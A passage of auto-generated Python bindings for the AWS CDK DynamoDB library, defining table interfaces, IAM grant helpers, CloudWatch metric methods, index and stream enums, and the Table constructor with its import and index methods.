:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all metric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
...
@jsii.member(jsii_name="metricSystemErrors")
def metric_system_errors(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the system errors.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount" | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all metric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
...
@jsii.member(jsii_name="metricUserErrors")
def metric_user_errors(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the user errors.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount" | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all metric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
...
class _ITableProxy(jsii.proxy_for(aws_cdk.core.IResource)):
"""An interface that represents a DynamoDB Table - either created with the CDK, or an existing one."""
__jsii_type__ = "@aws-cdk/aws-dynamodb.ITable"
@builtins.property
@jsii.member(jsii_name="tableArn")
def table_arn(self) -> str:
"""Arn of the dynamodb table.
attribute:
:attribute:: true
"""
return jsii.get(self, "tableArn")
@builtins.property
@jsii.member(jsii_name="tableName")
def table_name(self) -> str:
"""Table name of the dynamodb table.
attribute:
:attribute:: true
"""
return jsii.get(self, "tableName")
@builtins.property
@jsii.member(jsii_name="encryptionKey")
def encryption_key(self) -> typing.Optional[aws_cdk.aws_kms.IKey]:
"""Optional KMS encryption key associated with this table."""
return jsii.get(self, "encryptionKey")
@builtins.property
@jsii.member(jsii_name="tableStreamArn")
def table_stream_arn(self) -> typing.Optional[str]:
"""ARN of the table's stream, if there is one.
attribute:
:attribute:: true
"""
return jsii.get(self, "tableStreamArn")
@jsii.member(jsii_name="grant")
def grant(
self, grantee: aws_cdk.aws_iam.IGrantable, *actions: str
) -> aws_cdk.aws_iam.Grant:
"""Adds an IAM policy statement associated with this table to an IAM principal's policy.
If ``encryptionKey`` is present, appropriate grants to the key need to be added
separately using the ``table.encryptionKey.grant*`` methods.
:param grantee: The principal (no-op if undefined).
:param actions: The set of actions to allow (e.g. "dynamodb:PutItem", "dynamodb:GetItem", ...).
"""
return jsii.invoke(self, "grant", [grantee, *actions])
@jsii.member(jsii_name="grantFullAccess")
def grant_full_access(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits all DynamoDB operations ("dynamodb:*") to an IAM principal.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
return jsii.invoke(self, "grantFullAccess", [grantee])
@jsii.member(jsii_name="grantReadData")
def grant_read_data(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal all data read operations from this table: BatchGetItem, GetRecords, GetShardIterator, Query, GetItem, Scan.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
return jsii.invoke(self, "grantReadData", [grantee])
@jsii.member(jsii_name="grantReadWriteData")
def grant_read_write_data(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal to all data read/write operations to this table.
BatchGetItem, GetRecords, GetShardIterator, Query, GetItem, Scan,
BatchWriteItem, PutItem, UpdateItem, DeleteItem
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
return jsii.invoke(self, "grantReadWriteData", [grantee])
@jsii.member(jsii_name="grantStream")
def grant_stream(
self, grantee: aws_cdk.aws_iam.IGrantable, *actions: str
) -> aws_cdk.aws_iam.Grant:
"""Adds an IAM policy statement associated with this table's stream to an IAM principal's policy.
If ``encryptionKey`` is present, appropriate grants to the key need to be added
separately using the ``table.encryptionKey.grant*`` methods.
:param grantee: The principal (no-op if undefined).
:param actions: The set of actions to allow (e.g. "dynamodb:DescribeStream", "dynamodb:GetRecords", ...).
"""
return jsii.invoke(self, "grantStream", [grantee, *actions])
@jsii.member(jsii_name="grantStreamRead")
def grant_stream_read(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal all stream data read operations for this table's stream: DescribeStream, GetRecords, GetShardIterator, ListStreams.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
return jsii.invoke(self, "grantStreamRead", [grantee])
@jsii.member(jsii_name="grantTableListStreams")
def grant_table_list_streams(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM Principal to list streams attached to current dynamodb table.
:param grantee: The principal (no-op if undefined).
"""
return jsii.invoke(self, "grantTableListStreams", [grantee])
@jsii.member(jsii_name="grantWriteData")
def grant_write_data(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal all data write operations to this table: BatchWriteItem, PutItem, UpdateItem, DeleteItem.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
return jsii.invoke(self, "grantWriteData", [grantee])
@jsii.member(jsii_name="metric")
def metric(
self,
metric_name: str,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the number of Errors executing all Lambdas.
:param metric_name: -
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount" | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all metric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metric", [metric_name, props])
@jsii.member(jsii_name="metricConditionalCheckFailedRequests")
def metric_conditional_check_failed_requests(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the conditional check failed requests.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount" | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all metric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricConditionalCheckFailedRequests", [props])
@jsii.member(jsii_name="metricConsumedReadCapacityUnits")
def metric_consumed_read_capacity_units(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the consumed read capacity units.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount" | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all metric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricConsumedReadCapacityUnits", [props])
@jsii.member(jsii_name="metricConsumedWriteCapacityUnits")
def metric_consumed_write_capacity_units(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the consumed write capacity units.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount" | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all metric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricConsumedWriteCapacityUnits", [props])
@jsii.member(jsii_name="metricSuccessfulRequestLatency")
def metric_successful_request_latency(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the successful request latency.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount" | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all metric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricSuccessfulRequestLatency", [props])
@jsii.member(jsii_name="metricSystemErrors")
def metric_system_errors(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the system errors.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount" | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all metric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricSystemErrors", [props])
@jsii.member(jsii_name="metricUserErrors")
def metric_user_errors(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the user errors.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount" | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all metric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricUserErrors", [props])
@jsii.enum(jsii_type="@aws-cdk/aws-dynamodb.ProjectionType")
class ProjectionType(enum.Enum):
"""The set of attributes that are projected into the index.
see
:see: https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Projection.html
"""
KEYS_ONLY = "KEYS_ONLY"
"""Only the index and primary keys are projected into the index."""
INCLUDE = "INCLUDE"
"""Only the specified table attributes are projected into the index.
The list of projected attributes is in ``nonKeyAttributes``.
"""
ALL = "ALL"
"""All of the table attributes are projected into the index."""
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.SecondaryIndexProps",
jsii_struct_bases=[],
name_mapping={
"index_name": "indexName",
"non_key_attributes": "nonKeyAttributes",
"projection_type": "projectionType",
},
)
class SecondaryIndexProps:
def __init__(
self,
*,
index_name: str,
non_key_attributes: typing.Optional[typing.List[str]] = None,
projection_type: typing.Optional["ProjectionType"] = None,
) -> None:
"""Properties for a secondary index.
:param index_name: The name of the secondary index.
:param non_key_attributes: The non-key attributes that are projected into the secondary index. Default: - No additional attributes
:param projection_type: The set of attributes that are projected into the secondary index. Default: ALL
"""
self._values = {
"index_name": index_name,
}
if non_key_attributes is not None:
self._values["non_key_attributes"] = non_key_attributes
if projection_type is not None:
self._values["projection_type"] = projection_type
@builtins.property
def index_name(self) -> str:
"""The name of the secondary index."""
return self._values.get("index_name")
@builtins.property
def non_key_attributes(self) -> typing.Optional[typing.List[str]]:
"""The non-key attributes that are projected into the secondary index.
default
:default: - No additional attributes
"""
return self._values.get("non_key_attributes")
@builtins.property
def projection_type(self) -> typing.Optional["ProjectionType"]:
"""The set of attributes that are projected into the secondary index.
default
:default: ALL
"""
return self._values.get("projection_type")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "SecondaryIndexProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
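# Illustrative sketch: like the other jsii structs in this module, this type
# has value semantics, so two instances built from the same keyword arguments
# compare equal (names are hypothetical).
#
#   a = SecondaryIndexProps(index_name="byEmail")
#   b = SecondaryIndexProps(index_name="byEmail")
#   assert a == b  # structural equality over the captured values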
@jsii.enum(jsii_type="@aws-cdk/aws-dynamodb.StreamViewType")
class StreamViewType(enum.Enum):
"""When an item in the table is modified, StreamViewType determines what information is written to the stream for this table.
see
:see: https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_StreamSpecification.html
"""
NEW_IMAGE = "NEW_IMAGE"
"""The entire item, as it appears after it was modified, is written to the stream."""
OLD_IMAGE = "OLD_IMAGE"
"""The entire item, as it appeared before it was modified, is written to the stream."""
NEW_AND_OLD_IMAGES = "NEW_AND_OLD_IMAGES"
"""Both the new and the old item images of the item are written to the stream."""
KEYS_ONLY = "KEYS_ONLY"
"""Only the key attributes of the modified item are written to the stream."""
@jsii.implements(ITable)
class Table(
aws_cdk.core.Resource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-dynamodb.Table",
):
"""Provides a DynamoDB table."""
def __init__(
self,
scope: aws_cdk.core.Construct,
id: str,
*,
table_name: typing.Optional[str] = None,
partition_key: "Attribute",
billing_mode: typing.Optional["BillingMode"] = None,
encryption: typing.Optional["TableEncryption"] = None,
encryption_key: typing.Optional[aws_cdk.aws_kms.IKey] = None,
point_in_time_recovery: typing.Optional[bool] = None,
read_capacity: typing.Optional[jsii.Number] = None,
removal_policy: typing.Optional[aws_cdk.core.RemovalPolicy] = None,
replication_regions: typing.Optional[typing.List[str]] = None,
server_side_encryption: typing.Optional[bool] = None,
sort_key: typing.Optional["Attribute"] = None,
stream: typing.Optional["StreamViewType"] = None,
time_to_live_attribute: typing.Optional[str] = None,
write_capacity: typing.Optional[jsii.Number] = None,
) -> None:
"""
:param scope: -
:param id: -
:param table_name: Enforces a particular physical table name. Default: - <generated>
:param partition_key: Partition key attribute definition.
:param billing_mode: Specify how you are charged for read and write throughput and how you manage capacity. Default: PROVISIONED if ``replicationRegions`` is not specified, PAY_PER_REQUEST otherwise
:param encryption: Whether server-side encryption with an AWS managed customer master key is enabled. This property cannot be set if ``serverSideEncryption`` is set. Default: - server-side encryption is enabled with an AWS owned customer master key
:param encryption_key: External KMS key to use for table encryption. This property can only be set if ``encryption`` is set to ``TableEncryption.CUSTOMER_MANAGED``. Default: - If ``encryption`` is set to ``TableEncryption.CUSTOMER_MANAGED`` and this property is undefined, a new KMS key will be created and associated with this table.
:param point_in_time_recovery: Whether point-in-time recovery is enabled. Default: - point-in-time recovery is disabled
:param read_capacity: The read capacity for the table. Be careful if you add Global Secondary Indexes, as those will share the table's provisioned throughput. Can only be provided if billingMode is Provisioned. Default: 5
:param removal_policy: The removal policy to apply to the DynamoDB Table. Default: RemovalPolicy.RETAIN
:param replication_regions: Regions where replica tables will be created. Default: - no replica tables are created
:param server_side_encryption: Whether server-side encryption with an AWS managed customer master key is enabled. This property cannot be set if ``encryption`` and/or ``encryptionKey`` is set. Default: - server-side encryption is enabled with an AWS owned customer master key
:param sort_key: Table sort key attribute definition. Default: no sort key
:param stream: When an item in the table is modified, StreamViewType determines what information is written to the stream for this table. Default: - streams are disabled unless ``replicationRegions`` is specified
:param time_to_live_attribute: The name of TTL attribute. Default: - TTL is disabled
:param write_capacity: The write capacity for the table. Be careful if you add Global Secondary Indexes, as those will share the table's provisioned throughput. Can only be provided if billingMode is Provisioned. Default: 5
"""
props = TableProps(
table_name=table_name,
partition_key=partition_key,
billing_mode=billing_mode,
encryption=encryption,
encryption_key=encryption_key,
point_in_time_recovery=point_in_time_recovery,
read_capacity=read_capacity,
removal_policy=removal_policy,
replication_regions=replication_regions,
server_side_encryption=server_side_encryption,
sort_key=sort_key,
stream=stream,
time_to_live_attribute=time_to_live_attribute,
write_capacity=write_capacity,
)
jsii.create(Table, self, [scope, id, props])
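# Illustrative sketch of a minimal table definition (ids and attribute names
# are hypothetical; ``self`` is the enclosing Construct):
#
#   table = Table(self, "PayPerRequestTable",
#       partition_key=Attribute(name="id", type=AttributeType.STRING),
#       billing_mode=BillingMode.PAY_PER_REQUEST,  # no provisioned capacity
#       removal_policy=aws_cdk.core.RemovalPolicy.DESTROY,  # default is RETAIN
#   )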
@jsii.member(jsii_name="fromTableArn")
@builtins.classmethod
def from_table_arn(
cls, scope: aws_cdk.core.Construct, id: str, table_arn: str
) -> "ITable":
"""Creates a Table construct that represents an external table via table arn.
:param scope: The parent creating construct (usually ``this``).
:param id: The construct's name.
:param table_arn: The table's ARN.
"""
return jsii.sinvoke(cls, "fromTableArn", [scope, id, table_arn])
@jsii.member(jsii_name="fromTableAttributes")
@builtins.classmethod
def from_table_attributes(
cls,
scope: aws_cdk.core.Construct,
id: str,
*,
encryption_key: typing.Optional[aws_cdk.aws_kms.IKey] = None,
global_indexes: typing.Optional[typing.List[str]] = None,
local_indexes: typing.Optional[typing.List[str]] = None,
table_arn: typing.Optional[str] = None,
table_name: typing.Optional[str] = None,
table_stream_arn: typing.Optional[str] = None,
) -> "ITable":
"""Creates a Table construct that represents an external table.
:param scope: The parent creating construct (usually ``this``).
:param id: The construct's name.
:param encryption_key: KMS encryption key, if this table uses a customer-managed encryption key. Default: - no key
:param global_indexes: The names of the global indexes set for this Table. Note that you need to set either this property, or {@link localIndexes}, if you want methods like grantReadData() to grant permissions for indexes as well as the table itself. Default: - no global indexes
:param local_indexes: The names of the local indexes set for this Table. Note that you need to set either this property, or {@link globalIndexes}, if you want methods like grantReadData() to grant permissions for indexes as well as the table itself. Default: - no local indexes
:param table_arn: The ARN of the DynamoDB table. One of this, or {@link tableName}, is required. Default: - no table arn
:param table_name: The table name of the DynamoDB table. One of this, or {@link tableArn}, is required. Default: - no table name
:param table_stream_arn: The ARN of the table's stream. Default: - no table stream
"""
attrs = TableAttributes(
encryption_key=encryption_key,
global_indexes=global_indexes,
local_indexes=local_indexes,
table_arn=table_arn,
table_name=table_name,
table_stream_arn=table_stream_arn,
)
return jsii.sinvoke(cls, "fromTableAttributes", [scope, id, attrs])
@jsii.member(jsii_name="fromTableName")
@builtins.classmethod
def from_table_name(
cls, scope: aws_cdk.core.Construct, id: str, table_name: str
) -> "ITable":
"""Creates a Table construct that represents an external table via table name.
:param scope: The parent creating construct (usually ``this``).
:param id: The construct's name.
:param table_name: The table's name.
"""
return jsii.sinvoke(cls, "fromTableName", [scope, id, table_name])
@jsii.member(jsii_name="grantListStreams")
@builtins.classmethod
def grant_list_streams(
cls, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM Principal to list all DynamoDB Streams.
:param grantee: The principal (no-op if undefined).
deprecated
:deprecated: Use {@link #grantTableListStreams} for more granular permission
stability
:stability: deprecated
"""
return jsii.sinvoke(cls, "grantListStreams", [grantee])
@jsii.member(jsii_name="addGlobalSecondaryIndex")
def add_global_secondary_index(
self,
*,
partition_key: "Attribute",
read_capacity: typing.Optional[jsii.Number] = None,
sort_key: typing.Optional["Attribute"] = None,
write_capacity: typing.Optional[jsii.Number] = None,
index_name: str,
non_key_attributes: typing.Optional[typing.List[str]] = None,
projection_type: typing.Optional["ProjectionType"] = None,
) -> None:
"""Add a global secondary index of table.
:param partition_key: The attribute of a partition key for the global secondary index.
:param read_capacity: The read capacity for the global secondary index. Can only be provided if table billingMode is Provisioned or undefined. Default: 5
:param sort_key: The attribute of a sort key for the global secondary index. Default: - No sort key
:param write_capacity: The write capacity for the global secondary index. Can only be provided if table billingMode is Provisioned or undefined. Default: 5
:param index_name: The name of the secondary index.
:param non_key_attributes: The non-key attributes that are projected into the secondary index. Default: - No additional attributes
:param projection_type: The set of attributes that are projected into the secondary index. Default: ALL
"""
props = GlobalSecondaryIndexProps(
partition_key=partition_key,
read_capacity=read_capacity,
sort_key=sort_key,
write_capacity=write_capacity,
index_name=index_name,
non_key_attributes=non_key_attributes,
projection_type=projection_type,
)
return jsii.invoke(self, "addGlobalSecondaryIndex", [props])
@jsii.member(jsii_name="addLocalSecondaryIndex")
def add_local_secondary_index(
self,
*,
sort_key: "Attribute",
index_name: str,
non_key_attributes: typing.Optional[typing.List[str]] = None,
projection_type: typing.Optional["ProjectionType"] = None,
) -> None:
"""Add a local secondary index of table.
:param sort_key: The attribute of a sort key for the local secondary index.
:param index_name: The name of the secondary index.
:param non_key_attributes: The non-key attributes that are projected into the secondary index. Default: - No additional attributes
:param projection_type: The set of attributes that are projected into the secondary index. Default: ALL
"""
props = LocalSecondaryIndexProps(
sort_key=sort_key,
index_name=index_name,
non_key_attributes=non_key_attributes,
projection_type=projection_type,
)
return jsii.invoke(self, "addLocalSecondaryIndex", [props])
@jsii.member(jsii_name="autoScaleGlobalSecondaryIndexReadCapacity")
def auto_scale_global_secondary_index_read_capacity(
self, index_name: str, *, max_capacity: jsii.Number, min_capacity: jsii.Number
) -> "IScalableTableAttribute":
